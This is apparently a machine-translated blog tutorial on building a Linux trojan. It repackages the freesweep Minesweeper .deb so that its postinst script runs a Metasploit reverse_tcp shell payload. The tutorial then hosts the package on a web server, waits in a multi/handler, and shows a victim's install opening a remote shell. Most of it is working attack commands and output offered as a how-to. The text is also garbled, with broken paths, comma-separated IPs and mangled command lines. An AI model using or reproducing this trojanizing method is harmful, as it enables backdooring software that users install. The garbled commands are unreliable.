[Metasploit] Linux Trojan infecting
[Metasploit By: Shell Root]
Now after looking at some exploits, I began the search for a Trojan to infect Linux, more specifically Ubuntu 9.10. This tutorial is similar to the tutorial [Metasploit] Generating Executable with PAYLOAD ( http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html )
, which became a payload into an executable file to infect Windows, now we will do mime, but to infect Linux. shellroot @ shellroot-desktop: ~ $ sudo apt-get - download-only install freesweep [sudo] password for shellroot, Reading package lists ... Done Building dependency tree
Reading state information ... Done The following packages will be upgraded: freesweep 1 upgraded, 0 newly installed, 0 to remove and 183 not upgraded. 39.2 kB need to download files. be used 172KB of additional disk space after this operation. Des
: 1 http://co.archive.ubuntu.com karmic / universe freesweep 0.90 to 2 [39.2 kB] 
39.2 kB Downloaded 2s (19.1 kB / s) Download complete and
mode 39.2 kB Downloaded 2s (19.1 kB / s) Download complete and Create a folder where the files remain organized manner. In this case, will
/ home / shellroot / shellroot @ shellroot-desktop: ~ $ mkdir / home / shellroot / Trojan
Now the file you downloaded to start the move inside the folder you just created
( / home / shellroot / Trojan ) .
shellroot @ shellroot-desktop: ~ $ sudo mv / var/cache/apt/archives/freesweep_0.90-2_i386.deb / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ $
We position ourselves within the folder / home / shellroot / Trojan modifcamos
and folder permissions.
shellroot @ shellroot-desktop: ~ $ cd / home / shellroot / Trojancontrol postinst
shellroot @ shellroot-desktop: ~ / Trojan $ chmod 777 / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $
Unzip
file-2_i386.deb freesweep_0.90
within
folder / home / shellroot / Trojan
to add the PAYLOAD infection.
shellroot @ shellroot-desktop: ~ / $ dpkg-x Trojan freesweep_0.90-2_i386.deb @ shellroot shellroot
Game-desktop: ~ / Trojan $
Now create a folder called Debian, within it create 2 files.
shellroot @ shellroot-desktop: ~ / $ mkdir Game Trojan / DEBIAN
shellroot @ shellroot-desktop: ~ / $ cd Game Trojan / DEBIAN
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $Within the control file, we will post the following information:
Package: freesweep Version: 0.90 to 1 Section: Games & Fun Priority: Medium
Architecture: i386
Created: Ubuntu MOTU Developers (ubuntu-motu @ lists. ubuntu.com)
Description: Minesweeper is an implementation of the popular minesweeper game, trying to find all the mines without igniting any, based on suggestions given by the team.
postinst now within the file, put a script for the execution of our infected file. # / bin / sh
sudo chmod 2755 / usr / games / freesweep_scores & & / usr / games / freesweep_scores & / usr / games / freesweep &
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ msfpayload linux/x86/shell/reverse_tcp Lhoste = 192,168,142,137 lport = 1234 X> / home / shellroot / Trojan / Game / usr / games / freesweep_scores
Now create the Trojan with linux/x86/shell/reverse_tcp PAYLOAD, give the parameters and lport Lhoste and ubucacion the infected file.
Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell/reverse_tcp Length: 50 Options: Lhoste = 192,168,142,137, lport = 1234 shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
modifcamos Now postinst file permissions , and build the file again who is supposedly the "Game".shellroot @ shellroot-desktop: ~ / Trojan / Game / postinst chmod 755 $ DEBIAN
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ dpkg-deb - build / home / shellroot / Trojan / Game /
dpkg-deb: building package `freesweep 'to` / home / shellroot / Trojan / Juego.deb'.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
Re-contruccion
Juego.deb create the file which must change for freesweep.deb, so we move to the folder
/ home / shellroot / Trojan
, then, we will move to the Web server root for your next shock and infection.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ cd / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $ mv Juego.deb freesweep.deb
shellroot @ shellroot-desktop: ~ / Trojan freesweep.deb $ sudo cp / var / www /* Starting web server apache2 apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[sudo] password for shellroot:
shellroot @ shellroot-desktop: ~ / Trojan $
started the Apache Server
shellroot @ shellroot-desktop: ~ / $ Trojan sudo / etc/init.d/apache2 start
httpd (pid 1576) already running
[OK]
shellroot @ shellroot-desktop: ~ / Trojan $Now as when we did with Windows, we use the Auxiliary
multi / handler
, set in the same way that when we create the PAYLOAD and wait for the victim download and run the infected file.
shellroot @ shellroot-desktop: ~ $ sudo msfcli exploit / multi / handler PAYLOAD = linux/x86/shell/reverse_tcp Lhoste = 192,168,142,137
lport = 1234 E [sudo] password for shellroot:
[*] Please wait while we load the module tree ...
[*] Starting the payload handler ...
[*] Started on port 1234 reverse handler
Now suppose that we are the victim and download the file.
hacklab @ hacklab-desktop: ~ $ wget http://192.168.142.137/freesweep.deb200 OK Length: 39,214 (38K) [application / x-debian-package]
- 2010-01-21 23:36:27 - Connecting
http://192.168.142.137/freesweep.deb to 192.168.142.137:80 ... connected.
HTTP request sent, awaiting response ...
Saving "freesweep.deb" 100 %[=================== ====================================>] 39,214 --.- K / s in 0s
21/01/2010 23:36:29 (93.0 MB / s) - `freesweep.deb 'saved [39214/39214]
hacklab @ hacklab-desktop: ~ $
After downloading the file, installed it.
hacklab @ hacklab-desktop: ~ $ sudo dpkg-i freesweep.deb
Now look at the multi / handler Voala
and a session of
Meterpreter
[*] Sending Stage (36 bytes) [* ] Command shell session 1 OPEN (192.168.142.137:1234 -> 192.168.142.140:41233)
0 comments:
Post a Comment